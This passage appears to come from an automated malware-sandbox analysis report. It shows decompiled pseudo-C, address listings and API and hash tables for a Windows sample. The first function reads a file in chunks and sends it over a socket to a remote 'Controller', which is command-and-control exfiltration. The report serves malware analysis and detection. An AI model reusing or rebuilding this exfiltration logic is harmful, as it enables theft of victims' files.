				void* __ebx;
				void* __edi;
				void* __esi;
				struct %anon52 _t115;
				void* _t117;
				void* _t124;
				long _t134;
				void* _t135;
				signed int _t136;
				struct _OVERLAPPED* _t143;
				signed int _t146;
				void* _t152;
				void* _t154;
				void* _t155;
				void* _t171;
				long _t196;
				struct %anon52 _t201;
				void* _t214;
				union _LARGE_INTEGER _t275;
				union _LARGE_INTEGER _t277;
				void* _t291;
				intOrPtr _t292;
				void* _t296;
				void* _t297;
				void* _t298;
				void* _t299;

				_t275 = __edx;
				_t292 = __ecx;
				_v64 = __ecx;
				E00404943(__ecx);
				E004049DE(__ecx, __ecx, __ecx);
				_v32 = 0x186a0;
				_v60.LowPart = 0;
				_t291 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0);
				_t305 = _t291 - 0xffffffff;
				if(_t291 != 0xffffffff) {
					_v72.LowPart = 0;
					_v72.HighPart.LowPart = 0;
					__imp__GetFileSizeEx(_t291,  &_v72);
					_t201 = _v72.HighPart;
					_t115 = _v72;
					_v44 = _t201;
					_v20.LowPart = _t201;
					_v48 = _t115;
					_v16.LowPart = _t115;
					E00404260(0,  &_v104, _a4);
					_t117 = E00417D2B( &_v128,  &_v104);
					_t297 = _t296 - 0x18;
					_t277 = "Uploading file to Controller: ";
					E004053F2(0, _t297, _t277, _t291, __eflags, _t117);
					_t298 = _t297 - 0x14;
					E00402076(0, _t298, "i");
					E00417670(0, _t291);
					_t299 = _t298 + 0x30;
					E00401FB9();
					E00401EE2();
					_v36 = 1;
					_v40 = 0;
					_t124 = E00451A20(_v48, _v44, 0x186a0, 0);
					_t208 = _t277;
					asm("xorps xmm0, xmm0");
					_v80 = _t124 + 1;
					asm("adc ecx, ebx");
					asm("movlpd [ebp-0x34], xmm0");
					_v76.LowPart = _t277;
					__eflags = _v44;
					if(__eflags < 0) {
						L17:
						CloseHandle(_t291);
						E00404F18(_t292, _t277);
						_t196 = 1;
					} else {
						if(__eflags > 0) {
							L5:
							_t275 = 0;
							_v24 = _v56.HighPart.LowPart;
							_v56.HighPart.LowPart = _v56;
							_t134 = 0x186a0;
							goto L6;
							do {
								do {
									L6:
									__eflags = _t275 - _v20.LowPart;
									if(__eflags >= 0) {
										_t208 = _v16.LowPart;
										if(__eflags > 0) {
											L9:
											_t134 = _t208;
											_t208 = _v20.LowPart;
											_v32 = _t134;
											_v60.LowPart = _v20.LowPart;
										} else {
											__eflags = _t134 - _t208;
											if(__eflags > 0) {
												goto L9;
											}
										}
									}
									_push(_t134);
									_t135 = E0043021B(_t208, _t275, _t292, __eflags);
									_push(0);
									_v12 = _t135;
									_v28 = 0;
									_t136 = SetFilePointerEx(_t291, _v56.HighPart.LowPart, _v24, 0);
									__eflags = _t136;
									if(_t136 == 0) {
										_t300 = _t299 - 0x18;
										_t214 = _t299 - 0x18;
										_push("SetFilePointerEx error");
										goto L23;
									} else {
										_t146 = ReadFile(_t291, _v12, _v32,  &_v28, 0);
										__eflags = _t146;
										if(_t146 == 0) {
											_t300 = _t299 - 0x18;
											_t214 = _t299 - 0x18;
											_push("ReadFile error");
											L23:
											E00402076(0, _t214);
											E00402076(0, _t300 - 0x18, "E");
											E00417670(0, _t291);
											E00430224(_v12);
											CloseHandle(_t291);
											goto L24;
										} else {
											__eflags = _v28;
											if(__eflags == 0) {
												E00430224(_v12);
												CloseHandle(_t291);
												E00404F18(_t292, _t275);
												_t143 = 1;
												goto L25;
											} else {
												E00404260(0,  &_v104, _a4);
												_t152 = E0040209D(0,  &_v464, _t275, __eflags, _v12, _v28);
												_t299 = _t299 - 0x18;
												_t154 = E00417C50(0x46e250,  &_v440, _v80, _v76);
												_t155 = E00417C50(0x46e250,  &_v416, _v36, _v40);
												_t290 = E00402F85(0x46e250,  &_v128, E00402F85(0x46e250,  &_v152, E00402F85(0x46e250,  &_v176, E00402F0F( &_v200, E00402F85(0x46e250,  &_v224, E00402F0F( &_v248, E00402F85(0x46e250,  &_v272, E00402F85(0x46e250,  &_v296, E00402F85(0x46e250,  &_v320, E00402F85(0x46e250,  &_v344, E00402F85(0x46e250,  &_v368, E00417D8C(0x46e250,  &_v392,  &_v104), __eflags, 0x46e250), __eflags,  &_a8), __eflags, 0x46e250), __eflags,  &_a32), __eflags, 0x46e250), _t155), __eflags, 0x46e250), _t154), __eflags, 0x46e250), __eflags,  &_a56), __eflags, 0x46e250);
												E00402F0F(_t299, _t169, _t152);
												_t294 = _v64;
												_push(0x52);
												_t171 = E00404BB7(0x46e250, _v64, _t169, __eflags);
												__eflags = _t171 - 0xffffffff;
												E00401FB9();
												E00401FB9();
												E00401FB9();
												E00401FB9();
												E00401FB9();
												E00401FB9();
												E00401FB9();
												E00401FB9();
												E00401FB9();
												E00401FB9();
												E00401FB9();
												E00401FB9();
												E00401FB9();
												E00401FB9();
												E00401FB9();
												E00401EE2();
												__eflags = 0x46e200 | _t171 == 0xffffffff;
												if((0x46e200 | _t171 == 0xffffffff) != 0) {
													E00404F18(_t294, _t290);
													CloseHandle(_t291);
													E00430224(_v12);
													_t196 = 0;
												} else {
													goto L14;
												}
											}
										}
									}
									goto L18;
									L14:
									E00430224(_v12);
									_t134 = _v32;
									_v16.LowPart = _v16 - _t134;
									_t275 = _v60;
									asm("sbb [ebp-0x10], edx");
									_v36 = _v36 + 1;
									_push(0);
									_pop(0);
									asm("adc [ebp-0x24], ebx");
									_t208 = _v56.HighPart.LowPart + _t134;
									_v56.HighPart = _t208;
									asm("adc [ebp-0x14], edx");
									__eflags = _v24 - _v44;
									_t292 = _v64;
								} while (__eflags < 0);
								if(__eflags > 0) {
									goto L17;
								} else {
									goto L16;
								}
								goto L18;
								L16:
								__eflags = _t208 - _v48;
							} while (_t208 < _v48);
							goto L17;
						} else {
							__eflags = _v48;
							if(_v48 <= 0) {
								goto L17;
							} else {
								goto L5;
							}
						}
					}
				} else {
					E004020DE(0, _t296 - 0x18, _t275, _t305,  &_a8);
					_push(0x53);
					E00404BB7(0, 0x46e318, _t275, _t305);
					L24:
					E00404F18(_t292, _t275);
					_t143 = 0;
					L25:
					_t196 = _t143;
				}
				L18:
				E00401FB9();
				E00401FB9();
				E00401FB9();
				return _t196;
			}





























































                                                                                                0x0040663f
                                                                                                0x0040664a
                                                                                                0x0040664d
                                                                                                0x00406650
                                                                                                0x00406658
                                                                                                0x0040665f
                                                                                                0x00406679
                                                                                                0x00406682
                                                                                                0x00406684
                                                                                                0x00406687
                                                                                                0x004066ab
                                                                                                0x004066b0
                                                                                                0x004066b3
                                                                                                0x004066b9
                                                                                                0x004066bc
                                                                                                0x004066c2
                                                                                                0x004066c5
                                                                                                0x004066cb
                                                                                                0x004066ce
                                                                                                0x004066d1
                                                                                                0x004066dc
                                                                                                0x004066e1
                                                                                                0x004066e4
                                                                                                0x004066ec
                                                                                                0x004066f1
                                                                                                0x004066fb
                                                                                                0x00406700
                                                                                                0x00406705
                                                                                                0x0040670b
                                                                                                0x00406713
                                                                                                0x0040671e
                                                                                                0x00406729
                                                                                                0x0040672f
                                                                                                0x00406737
                                                                                                0x00406739
                                                                                                0x0040673c
                                                                                                0x0040673f
                                                                                                0x00406741
                                                                                                0x00406746
                                                                                                0x00406749
                                                                                                0x0040674c
                                                                                                0x004069e6
                                                                                                0x004069e7
                                                                                                0x004069ef
                                                                                                0x004069f4
                                                                                                0x00406752
                                                                                                0x00406752
                                                                                                0x0040675d
                                                                                                0x00406760
                                                                                                0x00406762
                                                                                                0x00406768
                                                                                                0x0040676b
                                                                                                0x0040676b
                                                                                                0x00406770
                                                                                                0x00406770
                                                                                                0x00406770
                                                                                                0x00406770
                                                                                                0x00406773
                                                                                                0x00406775
                                                                                                0x00406778
                                                                                                0x0040677e
                                                                                                0x0040677e
                                                                                                0x00406780
                                                                                                0x00406783
                                                                                                0x00406786
                                                                                                0x0040677a
                                                                                                0x0040677a
                                                                                                0x0040677c
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0040677c
                                                                                                0x00406778
                                                                                                0x00406789
                                                                                                0x0040678a
                                                                                                0x00406790
                                                                                                0x00406795
                                                                                                0x0040679b
                                                                                                0x0040679f
                                                                                                0x004067a5
                                                                                                0x004067a7
                                                                                                0x00406a5c
                                                                                                0x00406a5f
                                                                                                0x00406a61
                                                                                                0x00000000
                                                                                                0x004067ad
                                                                                                0x004067ba
                                                                                                0x004067c0
                                                                                                0x004067c2
                                                                                                0x00406a50
                                                                                                0x00406a53
                                                                                                0x00406a55
                                                                                                0x00406a66
                                                                                                0x00406a66
                                                                                                0x00406a75
                                                                                                0x00406a7a
                                                                                                0x00406a82
                                                                                                0x00406a8b
                                                                                                0x00000000
                                                                                                0x004067c8
                                                                                                0x004067c8
                                                                                                0x004067cc
                                                                                                0x00406a37
                                                                                                0x00406a3e
                                                                                                0x00406a46
                                                                                                0x00406a4d
                                                                                                0x00000000
                                                                                                0x004067d2
                                                                                                0x004067d8
                                                                                                0x004067e9
                                                                                                0x004067ee
                                                                                                0x0040680b
                                                                                                0x00406820
                                                                                                0x004068d8
                                                                                                0x004068dc
                                                                                                0x004068e1
                                                                                                0x004068e5
                                                                                                0x004068e9
                                                                                                0x004068ee
                                                                                                0x004068f7
                                                                                                0x00406902
                                                                                                0x0040690d
                                                                                                0x00406918
                                                                                                0x00406923
                                                                                                0x0040692e
                                                                                                0x00406939
                                                                                                0x00406944
                                                                                                0x0040694f
                                                                                                0x0040695a
                                                                                                0x00406965
                                                                                                0x00406970
                                                                                                0x0040697b
                                                                                                0x00406986
                                                                                                0x00406991
                                                                                                0x00406999
                                                                                                0x0040699e
                                                                                                0x004069a0
                                                                                                0x00406a1b
                                                                                                0x00406a21
                                                                                                0x00406a2a
                                                                                                0x00406a30
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004069a0
                                                                                                0x004067cc
                                                                                                0x004067c2
                                                                                                0x00000000
                                                                                                0x004069a2
                                                                                                0x004069a5
                                                                                                0x004069aa
                                                                                                0x004069ad
                                                                                                0x004069b0
                                                                                                0x004069b3
                                                                                                0x004069b6
                                                                                                0x004069c1
                                                                                                0x004069c3
                                                                                                0x004069c4
                                                                                                0x004069c7
                                                                                                0x004069c9
                                                                                                0x004069cc
                                                                                                0x004069cf
                                                                                                0x004069d2
                                                                                                0x004069d2
                                                                                                0x004069db
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004069dd
                                                                                                0x004069dd
                                                                                                0x004069dd
                                                                                                0x00000000
                                                                                                0x00406754
                                                                                                0x00406754
                                                                                                0x00406757
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00406757
                                                                                                0x00406752
                                                                                                0x00406689
                                                                                                0x00406692
                                                                                                0x00406697
                                                                                                0x0040669e
                                                                                                0x00406a91
                                                                                                0x00406a93
                                                                                                0x00406a98
                                                                                                0x00406a9a
                                                                                                0x00406a9a
                                                                                                0x00406a9a
                                                                                                0x004069f6
                                                                                                0x004069f9
                                                                                                0x00406a01
                                                                                                0x00406a09
                                                                                                0x00406a16

                                                                                                APIs
                                                                                                  • Part of subcall function 004049DE: connect.WS2_32(FFFFFFFF,?,?), ref: 004049F6
                                                                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0040667C
                                                                                                • GetFileSizeEx.KERNEL32(00000000,?), ref: 004066B3
                                                                                                • __aulldiv.LIBCMT ref: 0040672F
                                                                                                • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000,?,?,000186A0,00000000), ref: 0040679F
                                                                                                • ReadFile.KERNEL32(00000000,?,000186A0,?,00000000), ref: 004067BA
                                                                                                  • Part of subcall function 00404BB7: send.WS2_32(?,00000000,00000000,00000000), ref: 00404C2B
                                                                                                  • Part of subcall function 00404F18: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0046E268,00000000,00404D9D,00000000,00000000,00000000,00000000,0046E268,0000000C), ref: 00404F22
                                                                                                  • Part of subcall function 00404F18: SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040558F), ref: 00404F31
                                                                                                  • Part of subcall function 00404F18: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040558F), ref: 00404F3A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$CloseCreateEventHandleObjectPointerReadSingleSizeWait__aulldivconnectsend
                                                                                                • String ID: PF$ReadFile error$SetFilePointerEx error$Uploading file to Controller:
                                                                                                • API String ID: 4212504463-204989135
                                                                                                • Opcode ID: b503e318100d39b7385c6b39062d2101c3b1ccf20bc28210d2f18f2475aba8e4
                                                                                                • Instruction ID: 03515be065d0fd85a620034be54720d5bfb627ccde470538336df9fe0d4744a6
                                                                                                • Opcode Fuzzy Hash: b503e318100d39b7385c6b39062d2101c3b1ccf20bc28210d2f18f2475aba8e4
                                                                                                • Instruction Fuzzy Hash: D3C17971A00119ABCB04EBA5DD929EEB7B9AF44308F10417FF506722D1EF789E85CB58
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 004198B9, Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 74windowCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 64%
                                                                                                			E004198B9(void* __ecx, struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				struct tagPOINT _v12;
				void* _t16;
				struct HMENU__* _t17;
				void* _t20;
				void* _t24;

				_t16 = _a8 - 1;
				if(_t16 == 0) {
					_t17 = CreatePopupMenu();
					 *0x46deac = _t17;
					AppendMenuA(_t17, 0, 0, "Close");
					L15:
					return 0;
				}
				_t20 = _t16 - 0x110;
				if(_t20 == 0) {
					if(_a12 != 0) {
						goto L15;
					}
					Shell_NotifyIconA(2, 0x46deb0);
					ExitProcess(0);
				}
				if(_t20 == 0x2f0) {
					_t24 = _a16 - 0x201;
					if(_t24 == 0) {
						if(IsWindowVisible( *0x46e0ac) == 0) {
							ShowWindow( *0x46e0ac, 9);
							SetForegroundWindow( *0x46e0ac);
						} else {
							ShowWindow( *0x46e0ac, 0);
						}
						goto L15;
					}
					if(_t24 == 3) {
						GetCursorPos( &_v12);
						SetForegroundWindow(_a4);
						TrackPopupMenu( *0x46deac, 0, _v12, _v12.y, 0, _a4, 0);
						goto L15;
					}
					_push(_a16);
					_push(_a12);
					_push(0x401);
					L7:
					return DefWindowProcA(_a4, ??, ??, ??);
				}
				_push(_a16);
				_push(_a12);
				_push(_a8);
				goto L7;
			}








                                                                                                0x004198c1
                                                                                                0x004198c4
                                                                                                0x00419995
                                                                                                0x004199a2
                                                                                                0x004199aa
                                                                                                0x004199b0
                                                                                                0x00000000
                                                                                                0x004199b0
                                                                                                0x004198ca
                                                                                                0x004198cf
                                                                                                0x0041997e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00419987
                                                                                                0x0041998f
                                                                                                0x0041998f
                                                                                                0x004198da
                                                                                                0x004198ea
                                                                                                0x004198ef
                                                                                                0x0041994c
                                                                                                0x00419966
                                                                                                0x00419972
                                                                                                0x0041994e
                                                                                                0x00419956
                                                                                                0x00419956
                                                                                                0x00000000
                                                                                                0x0041994c
                                                                                                0x004198f4
                                                                                                0x00419913
                                                                                                0x0041991c
                                                                                                0x00419936
                                                                                                0x00000000
                                                                                                0x00419936
                                                                                                0x004198f6
                                                                                                0x004198f9
                                                                                                0x004198fc
                                                                                                0x00419901
                                                                                                0x00000000
                                                                                                0x00419904
                                                                                                0x004198dc
                                                                                                0x004198df
                                                                                                0x004198e2
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • DefWindowProcA.USER32(?,00000401,?,?), ref: 00419904
                                                                                                • GetCursorPos.USER32(?), ref: 00419913
                                                                                                • SetForegroundWindow.USER32(?), ref: 0041991C
                                                                                                • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 00419936
                                                                                                • Shell_NotifyIconA.SHELL32(00000002,0046DEB0), ref: 00419987
                                                                                                • ExitProcess.KERNEL32 ref: 0041998F
                                                                                                • CreatePopupMenu.USER32 ref: 00419995
                                                                                                • AppendMenuA.USER32 ref: 004199AA
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                                                • String ID: Close
                                                                                                • API String ID: 1657328048-3535843008
                                                                                                • Opcode ID: 241817903c567134a00bb5065f5f6e20a35be39454b02068a114404e5fd59868
                                                                                                • Instruction ID: 7947dd2c1efd330abad668ff4a12812bac83b808f9a2396390bbf0c7fa51e3ba
                                                                                                • Opcode Fuzzy Hash: 241817903c567134a00bb5065f5f6e20a35be39454b02068a114404e5fd59868
                                                                                                • Instruction Fuzzy Hash: 80216B71610209FFDB095FA4ED1DEAA3B75EB04302F004139F91298271D7BA9DA0EB1D
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0044088B, Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 91%
                                                                                                			E0044088B(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr* _a4) {
				signed int _v8;
				char _v21;
				intOrPtr _v22;
				struct _cpinfo _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				intOrPtr* _v44;
				signed int _v48;
				void* _v52;
				signed int* _v56;
				intOrPtr _v60;
				intOrPtr* _v64;
				signed int* _v68;
				void* _v72;
				char _v76;
				signed int _t101;
				signed int _t123;
				signed short _t126;
				void* _t130;
				void* _t134;
				void* _t137;
				void* _t138;
				intOrPtr _t139;
				void* _t141;
				signed int _t142;
				intOrPtr* _t143;
				signed char _t160;
				signed char _t165;
				signed int _t166;
				void* _t168;
				signed int _t170;
				void* _t179;
				signed int* _t180;
				signed int* _t181;
				signed int _t182;
				signed char* _t189;
				signed char* _t190;
				signed int _t192;
				void* _t193;
				intOrPtr _t197;
				short* _t209;
				intOrPtr* _t211;
				intOrPtr* _t215;
				signed int _t216;
				signed int _t217;
				void* _t218;
				void* _t219;

				_t101 =  *0x46c00c; // 0x4cc22724
				_v8 = _t101 ^ _t217;
				_t211 = _a4;
				_t170 = 0;
				_v64 = _t211;
				_v32 = 0;
				_t172 =  *((intOrPtr*)(_t211 + 0xa8));
				_v36 = 0;
				_v40 = 0;
				_v52 = 0;
				_v76 = _t211;
				_v72 = 0;
				if( *((intOrPtr*)(_t211 + 0xa8)) == 0) {
					__eflags =  *(_t211 + 0x8c);
					if( *(_t211 + 0x8c) != 0) {
						asm("lock dec dword [eax]");
					}
					 *(_t211 + 0x8c) = _t170;
					__eflags = 0;
					 *(_t211 + 0x90) = _t170;
					 *_t211 = 0x458830;
					 *((intOrPtr*)(_t211 + 0x94)) = 0x458ab0;
					 *((intOrPtr*)(_t211 + 0x98)) = 0x458c30;
					 *((intOrPtr*)(_t211 + 4)) = 1;
					L41:
					return E00430A5B(_v8 ^ _t217);
				}
				_t106 = _t211 + 8;
				_v44 = 0;
				if( *(_t211 + 8) != 0) {
					L3:
					_v44 = E00440628(_t172, 1, 4);
					E004414D5(_t170);
					_v32 = E00440628(_t172, 0x180, 2);
					E004414D5(_t170);
					_v36 = E00440628(_t172, 0x180, 1);
					E004414D5(_t170);
					_v40 = E00440628(_t172, 0x180, 1);
					E004414D5(_t170);
					_t197 = E00440628(_t172, 0x101, 1);
					_v52 = _t197;
					E004414D5(_t170);
					_t219 = _t218 + 0x3c;
					if(_v44 == _t170 || _v32 == _t170 || _t197 == 0 || _v36 == _t170 || _v40 == _t170) {
						L36:
						E004414D5(_v44);
						E004414D5(_v32);
						E004414D5(_v36);
						E004414D5(_v40);
						_t170 = 1;
						__eflags = 1;
						goto L37;
					} else {
						_t123 = _t170;
						do {
							 *(_t123 + _t197) = _t123;
							_t123 = _t123 + 1;
						} while (_t123 < 0x100);
						if(GetCPInfo( *(_t211 + 8),  &_v28) == 0) {
							goto L36;
						}
						_t126 = _v28;
						_t235 = _t126 - 5;
						if(_t126 > 5) {
							goto L36;
						}
						_t28 = _t197 + 1; // 0x1
						_v48 = _t126 & 0x0000ffff;
						_t192 = 0xff;
						_t130 = E00444A05(_t197, _t211, _t235, _t170,  *((intOrPtr*)(_t211 + 0xa8)), 0x100, _t28, 0xff, _v36 + 0x81, 0xff,  *(_t211 + 8), _t170);
						_t219 = _t219 + 0x24;
						_t236 = _t130;
						if(_t130 == 0) {
							goto L36;
						}
						_t34 = _t197 + 1; // 0x1
						_t134 = E00444A05(_t197, _t211, _t236, _t170,  *((intOrPtr*)(_t211 + 0xa8)), 0x200, _t34, 0xff, _v40 + 0x81, 0xff,  *(_t211 + 8), _t170);
						_t219 = _t219 + 0x24;
						if(_t134 == 0) {
							goto L36;
						}
						if(_v48 <= 1 || _v22 == _t170) {
							L22:
							_v60 = _v32 + 0x100;
							_t137 = E0044A5FC(_t170, _t192, _t197, _t211, _t242, _t170, 1, _t197, 0x100, _v32 + 0x100,  *(_t211 + 8), _t170);
							_t219 = _t219 + 0x1c;
							if(_t137 == 0) {
								goto L36;
							}
							_t193 = _v32;
							_t138 = _t193 + 0xfe;
							 *_t138 = 0;
							_t179 = _v36;
							_v32 = _t138;
							_t139 = _v40;
							 *(_t179 + 0x7f) = _t170;
							_t180 = _t179 - 0xffffff80;
							 *(_t139 + 0x7f) = _t170;
							_v68 = _t180;
							 *_t180 = _t170;
							_t181 = _t139 + 0x80;
							_v56 = _t181;
							 *_t181 = _t170;
							if(_v48 <= 1 || _v22 == _t170) {
								L32:
								_t182 = 0x3f;
								memcpy(_t193, _t193 + 0x200, _t182 << 2);
								_push(0x1f);
								asm("movsw");
								_t141 = memcpy(_v36, _v36 + 0x100, 0 << 2);
								_push(0x1f);
								asm("movsw");
								asm("movsb");
								_t142 = memcpy(_t141, _t141 + 0x100, 0 << 2);
								asm("movsw");
								asm("movsb");
								_t215 = _v64;
								if( *((intOrPtr*)(_t215 + 0x8c)) != 0) {
									asm("lock xadd [ecx], eax");
									if((_t142 | 0xffffffff) == 0) {
										E004414D5( *(_t215 + 0x90) - 0xfe);
										E004414D5( *(_t215 + 0x94) - 0x80);
										E004414D5( *(_t215 + 0x98) - 0x80);
										E004414D5( *((intOrPtr*)(_t215 + 0x8c)));
									}
								}
								_t143 = _v44;
								 *_t143 = 1;
								 *((intOrPtr*)(_t215 + 0x8c)) = _t143;
								 *_t215 = _v60;
								 *(_t215 + 0x90) = _v32;
								 *(_t215 + 0x94) = _v68;
								 *(_t215 + 0x98) = _v56;
								 *(_t215 + 4) = _v48;
								L37:
								E004414D5(_v52);
								goto L41;
							} else {
								_t189 =  &_v21;
								while(1) {
									_t160 =  *_t189;
									if(_t160 == 0) {
										break;
									}
									_t216 =  *(_t189 - 1) & 0x000000ff;
									if(_t216 > (_t160 & 0x000000ff)) {
										L30:
										_t189 =  &(_t189[2]);
										if( *(_t189 - 1) != _t170) {
											continue;
										}
										break;
									}
									_t209 = _t193 + 0x100 + _t216 * 2;
									do {
										_t216 = _t216 + 1;
										 *_t209 = 0x8000;
										_t209 = _t209 + 2;
									} while (_t216 <= ( *_t189 & 0x000000ff));
									goto L30;
								}
								goto L32;
							}
						} else {
							_t190 =  &_v21;
							while(1) {
								_t165 =  *_t190;
								if(_t165 == 0) {
									goto L22;
								}
								_t192 =  *(_t190 - 1) & 0x000000ff;
								_t166 = _t165 & 0x000000ff;
								while(_t192 <= _t166) {
									 *((char*)(_t192 + _t197)) = 0x20;
									_t192 = _t192 + 1;
									__eflags = _t192;
									_t166 =  *_t190 & 0x000000ff;
								}
								_t190 =  &(_t190[2]);
								_t242 =  *(_t190 - 1) - _t170;
								if( *(_t190 - 1) != _t170) {
									continue;
								}
								goto L22;
							}
							goto L22;
						}
					}
				}
				_t168 = E0044C344(0, __edx, __edi, _t211,  &_v76, 0, _t172, 0x1004, _t106);
				_t219 = _t218 + 0x14;
				if(_t168 != 0) {
					goto L36;
				}
				goto L3;
			}



















































                                                                                                0x00440893
                                                                                                0x0044089a
                                                                                                0x0044089f
                                                                                                0x004408a2
                                                                                                0x004408a5
                                                                                                0x004408a8
                                                                                                0x004408ab
                                                                                                0x004408b1
                                                                                                0x004408b4
                                                                                                0x004408b7
                                                                                                0x004408ba
                                                                                                0x004408bd
                                                                                                0x004408c2
                                                                                                0x00440be2
                                                                                                0x00440be4
                                                                                                0x00440be6
                                                                                                0x00440be6
                                                                                                0x00440be9
                                                                                                0x00440bef
                                                                                                0x00440bf1
                                                                                                0x00440bf7
                                                                                                0x00440bfd
                                                                                                0x00440c07
                                                                                                0x00440c11
                                                                                                0x00440c18
                                                                                                0x00440c28
                                                                                                0x00440c28
                                                                                                0x004408c8
                                                                                                0x004408cb
                                                                                                0x004408d0
                                                                                                0x004408ee
                                                                                                0x004408f8
                                                                                                0x004408fb
                                                                                                0x0044090e
                                                                                                0x00440911
                                                                                                0x0044091f
                                                                                                0x00440922
                                                                                                0x00440930
                                                                                                0x00440933
                                                                                                0x00440944
                                                                                                0x00440947
                                                                                                0x0044094a
                                                                                                0x0044094f
                                                                                                0x00440955
                                                                                                0x00440ba9
                                                                                                0x00440bac
                                                                                                0x00440bb4
                                                                                                0x00440bbc
                                                                                                0x00440bc4
                                                                                                0x00440bce
                                                                                                0x00440bce
                                                                                                0x00000000
                                                                                                0x0044097e
                                                                                                0x0044097e
                                                                                                0x00440980
                                                                                                0x00440980
                                                                                                0x00440983
                                                                                                0x00440984
                                                                                                0x0044099a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004409a0
                                                                                                0x004409a3
                                                                                                0x004409a6
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004409b3
                                                                                                0x004409b6
                                                                                                0x004409b9
                                                                                                0x004409d6
                                                                                                0x004409db
                                                                                                0x004409de
                                                                                                0x004409e0
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004409fa
                                                                                                0x00440a0a
                                                                                                0x00440a0f
                                                                                                0x00440a14
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00440a1e
                                                                                                0x00440a4b
                                                                                                0x00440a61
                                                                                                0x00440a64
                                                                                                0x00440a69
                                                                                                0x00440a6e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00440a74
                                                                                                0x00440a79
                                                                                                0x00440a7f
                                                                                                0x00440a82
                                                                                                0x00440a85
                                                                                                0x00440a88
                                                                                                0x00440a8b
                                                                                                0x00440a8e
                                                                                                0x00440a95
                                                                                                0x00440a98
                                                                                                0x00440a9b
                                                                                                0x00440a9d
                                                                                                0x00440aa3
                                                                                                0x00440aa6
                                                                                                0x00440aa8
                                                                                                0x00440aea
                                                                                                0x00440aec
                                                                                                0x00440af5
                                                                                                0x00440afa
                                                                                                0x00440afd
                                                                                                0x00440b07
                                                                                                0x00440b09
                                                                                                0x00440b0c
                                                                                                0x00440b0e
                                                                                                0x00440b17
                                                                                                0x00440b19
                                                                                                0x00440b1b
                                                                                                0x00440b1c
                                                                                                0x00440b27
                                                                                                0x00440b2c
                                                                                                0x00440b30
                                                                                                0x00440b3e
                                                                                                0x00440b51
                                                                                                0x00440b5f
                                                                                                0x00440b6a
                                                                                                0x00440b6f
                                                                                                0x00440b30
                                                                                                0x00440b72
                                                                                                0x00440b75
                                                                                                0x00440b7b
                                                                                                0x00440b84
                                                                                                0x00440b89
                                                                                                0x00440b92
                                                                                                0x00440b9b
                                                                                                0x00440ba4
                                                                                                0x00440bcf
                                                                                                0x00440bd2
                                                                                                0x00000000
                                                                                                0x00440aaf
                                                                                                0x00440aaf
                                                                                                0x00440ab2
                                                                                                0x00440ab2
                                                                                                0x00440ab6
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00440ab8
                                                                                                0x00440ac1
                                                                                                0x00440adf
                                                                                                0x00440adf
                                                                                                0x00440ae5
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00440ae5
                                                                                                0x00440ac9
                                                                                                0x00440acc
                                                                                                0x00440ad1
                                                                                                0x00440ad2
                                                                                                0x00440ad5
                                                                                                0x00440adb
                                                                                                0x00000000
                                                                                                0x00440acc
                                                                                                0x00000000
                                                                                                0x00440ae7
                                                                                                0x00440a25
                                                                                                0x00440a25
                                                                                                0x00440a28
                                                                                                0x00440a28
                                                                                                0x00440a2c
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00440a2e
                                                                                                0x00440a32
                                                                                                0x00440a3f
                                                                                                0x00440a37
                                                                                                0x00440a3b
